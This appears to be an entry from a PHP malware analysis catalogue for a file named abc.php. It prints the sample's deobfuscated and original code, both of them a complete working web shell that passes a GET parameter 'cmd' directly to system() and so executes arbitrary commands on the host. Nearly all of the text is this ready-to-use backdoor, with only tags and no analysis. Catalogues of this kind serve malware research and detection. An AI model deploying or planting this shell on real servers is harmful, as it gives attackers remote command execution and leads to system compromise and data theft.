PHP Malware Analysis

Back to list

Filename: abc.php

Tags

Execution
  • system
Input
  • _GET

Deobfuscated code

<html>

<body>
    <form method="GET" name="<?php 
echo basename($_SERVER['PHP_SELF']);
?>">
        <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
        <input type="SUBMIT" value="Execute">
    </form>
    <pre>
<?php 
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
</pre>
</body>

</html>


Original code

<html>

<body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
        <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
        <input type="SUBMIT" value="Execute">
    </form>
    <pre>
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
</pre>
</body>

</html>